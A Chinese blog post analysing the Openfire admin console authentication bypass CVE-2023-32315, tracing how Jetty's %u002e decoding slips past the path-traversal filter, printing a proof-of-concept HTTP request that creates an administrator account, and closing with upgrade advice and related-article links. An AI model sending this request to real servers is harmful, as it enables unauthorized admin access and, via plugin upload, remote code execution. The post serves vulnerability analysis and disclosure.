漏洞分析|openfire web管理员控制台验证绕过漏洞(CVE-2023-32315)

最新推荐文章于 2024-05-31 22:05:29 发布
最新推荐文章于 2024-05-31 22:05:29 发布
阅读量369 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandaoren/article/details/134644414
版权

1.漏洞描述

Ignite Realtime Openfire是Ignite Realtime社区的一款采用Java开发且基于XMPP(前称Jabber,即时通讯协议)的跨平台开源实时协作(RTC)服务器,它能够构建高效率的即时通信服务器,并支持上万并发用户数量。

在 4.7.4 和 4.6.7 之前的版本中,发现 Openfire 的管理控制台(管理控制台)是一个基于 Web 的应用程序,容易受到通过设置环境进行的路径遍历攻击。这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境来访问为管理用户保留的 Openfire 管理控制台中的受限页面。

2.影响版本

3.10.0 <= Openfire < 4.6.8,4.7.0 <= Openfire < 4.7.5

3.影响范围

4.漏洞分析

先从xmppserver/src/main/webapp/WEB-INF/web.xml开始分析,这段配置定义了一个AuthCheck filter,用于排除对部分url的权限检查,包括登录/注销页面、系统设置及其子页面、静态资源文件等:

接着查看filter,xmppserver/src/main/java/org/jivesoftware/admin/AuthCheckFilter.java

这里的excludes就是AuthCheck filter配置的部分,然后就去调用testURLPassesExclude(),若返回true,则break,也就说明请求路径无需鉴权。

testURLPassesExclude()起到了关键作用。

因为匹配到excludes存在的setup/setup-*,进入url检测,这里已经对”..”以及”%2e”进行了过滤,所以普通的路径遍历特征都会被拦截,但新版本中的Jetty Web服务器支持对%u002e这类非标准unicode uri的解析,也就又给攻击者提供了一种利用方式。

首先看org.eclipse.jetty.http.HttpURI#parse() ,这是Jetty中用于解析HTTP请求URI的方法。它的作用是将HTTP请求URI字符串解析为一个包含多个属性的Java对象,以便Jetty可以根据这些属性来处理HTTP请求,我们需要关注的是URI的路径部分是如何处理的:

这里给出了两个判断条件,第一,如果URI的路径部分既没有进行编码,也没有包含点或双点符号,则说明路径是正确的,可以直接使用;第二,如果URI的路径部分不为空,则需要对它进行解码和规范化操作,着重关注第二个条件,代码先使用了URIUtil.decodePath()方法对_path进行解码,得到解码后的路径字符串。然后,又使用URIUtil.canonicalPath()方法对解码后的路径字符串进行规范化,得到规范化后的路径字符串。最后,如果规范化后的路径字符串为null,则抛出IllegalArgumentException异常。

跟进org.eclipse.jetty.util.URIUtil#decodePath(),进一步分析%uxxxx的解码流程:

主要的解码逻辑写在了for循环里,它会遍历整个路径字符串,并对编码字符进行解码。其中,builder用于存储解码后的路径字符串,如果遇到%,会检查builder是否为null,如果是的话,就说明还没有解码过任何字符,需要先将%前面的字符拷贝到builder中,这样做的目的是保证解码后的uri路径完整。然后,再根据后面的字符决定unicode/ascii解码,得到解码后的路径字符串,最后由org.eclipse.jetty.util.URIUtil#canonicalPath()进行规范处理。以绕过的payload为例,处理流程如下:

/setup/setup-/%u002e%u002e/%u002e%u002e/log.jsp
-> /setup/setup-/../../log.jsp
-> /log.jsp
Poc:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=test&name=&email=&password=test&passwordConfirm=test&isadmin=on&create=Create+User HTTP/1.1
Host: ip:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken

5.修复建议

  • 官方升级

目前官方已发布安全版本修复此漏洞,建议受影响的用户及时升级防护:

https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm

AttackSatelliteLab
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Openfire身份认证绕过漏洞复现+利用(CVE-2023-32315)
0xSec
06-15 8482
Openfire的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
【1day】复现Openfire 权限绕过漏洞CVE-2023-32315
记录并分享学习安全的知识点..
07-17 433
Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。 Openfire安装和使用都非常简单,并利用Web进行管理。单台服务器甚至可支持上万并发用户。由于Openfire的路径名限制不恰当,未经身份认证的远程攻击者可以构造恶意请求利用该漏洞,成功利用此漏洞可以绕过身份认证登录管理界面。
Openfire漏洞CVE-2019-18393/18394)
公众号shadow sock7
08-05 5267
77@ubuntu129:~/repos$ wget https://github.com/igniterealtime/Openfire/releases/download/v4.4.2/openfire_4.4.2_all.deb 77@ubuntu129:~/repos$ sudo dpkg -i openfire_4.4.2_all.deb Selecting previously unselected package openfire. (Reading database ... 332004
Weblogic反序列化漏洞原理分析漏洞复现(CVE-2024-2628 CVE-2024-21839复现)_weblogic payload(1)
2301_77121488的博客
05-13 1045
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Openfire管理后台认证绕过漏洞CVE-2023-32315)vulhub复现
qq_53003652的博客
07-11 1211
虽然这个请求的响应包中包含异常,但实际上新用户已经被创建,账号密码均为。现在使用UTF-16绕过该防护。直接使用创建的新用户登录后台。抓包,发送如下数据包。
最近读openfire源码发现一个bug
mark's technic world
04-19 648
DefaultCache 320行代码 public Object[] toArray() { Object[] array = new Object[size()]; Iterator it = iterator(); int i = 0; while (it.hasNext()) {
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
复现CVE-2023-32315
openfire-pade-plugin:Openfire的插件,可提供基于Web的统一通信-聊天,群组聊天,电话,音频和视频会议
03-21
Pàdéfor Openfire该项目为Openfire提供了基于Web的统一通信解决方案。基于点对点的聊天,持续的群聊,音频,视频会议和实时流媒体,电话会议它包括第三方产品,特别是: 项目; 项目; Web客户端。 项目。基于项目...
openfire-4.3.0-1.x86_64
01-13
openfire-4.3.0-1.x86_64.rpm, 为CentOS 安装 提供,开发即时消息使用
jwchat-1.0beta3.rar_ajax jabber_jwchat_jwchat-1.0_openfire
09-22
用Ajax实现的jabber客户端,可以使用ejabberd服务器,也可以使用openfire服务器,界面功能比较完善。
漏洞分析 | Ignite Realtime Openfire 路径遍历漏洞(CVE-2023-32315)
WangsuSecurity的博客
08-25 479
Openfire存在认证绕过漏洞,未经身份认证的远程攻击者可以构造恶意请求访问受限界面,最终上传恶意文件实现远程代码执行。
黑客利用高危 Openfire 漏洞加密服务器
smellycat000的专栏
09-27 160
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士黑客正在利用 Openfire 通讯服务器中的一个高危漏洞,以勒索软件加密服务器并部署密币挖矿机。Openfire 是一款广泛使用的基于 Java 的开源聊天 (XMPP) 服务器,下载次数已达900多万次,广泛应用于多平台的安全聊天通信中。该漏洞的编号是CVE-2023-32315,是影响 Openfire 管理面板的认证绕过漏洞,可导致未认证...
漏洞复现学习:openfire鉴权绕过漏洞复现(CVE-2024-32315)_openfireadministrationconsole(1)
m0_59117112的博客
04-16 434
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
【高危】Openfire权限绕过漏洞(POC公开)
murphysec的博客
06-26 770
Openfire是Java开发且基于XMPP(前称Jabber,即时通讯协议)的开源实时协作(RTC)服务器。在受影响版本中,由于路径验证机制存在缺陷,攻击者可以通过/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp形式的URL绕过访问控制,未授权访问后台页面,并进一步利用安装插件功能远程执行任意代码。
漏洞复现学习:openfire鉴权绕过漏洞复现(CVE-2023-32315
jjjjj34的博客
01-03 1178
第一张图里的代码,它会先判读是否含有setup/setup-*,如过含有就会跳到下面的判读,接下来的判断就是对用户输入的字符串进行一个过滤,如果用户输入的字符串不含有。这串代码就是openfire的鉴权机制,我们看到这红框中的最后有一个通配符,而我们可以利用这个通配符从而达到绕过openfire的鉴权机制。,编码为%u002e,验证payload:/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp。和%2e,则返回true。和%2e被过滤了,那我们就将。
CVE-2023-46604复现学习
shierbai的博客
05-19 580
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
CraftCMS ConditionsController.php 代码执行漏洞CVE-2023-41892)
最新发布
0xSec
05-31 550
CraftCMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
cc123489ll的博客
05-23 1166
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow SparkProvider 任意文件读取漏洞(CVE-2023-40272)。针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其中 NPM 组件包 mall-front-babel-directive。
CVE-2023-32315
09-08
CVE-2023-32315是Ignite Realtime Openfire权限绕过漏洞。这个漏洞允许攻击者绕过Openfire的身份认证机制,获取未经授权的访问权限漏洞的CVSS评分为9.8,表示其严重性很高。 关于CVE-2023-32315的详细信息以及漏洞利用插件,你可以通过Goby社区版进行下载和查看。Goby是一款漏洞扫描和管理工具,你可以使用它来获取更多关于该漏洞的信息以及其他漏洞的历史合集。你还可以关注Goby的公众号获取最新的动态消息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值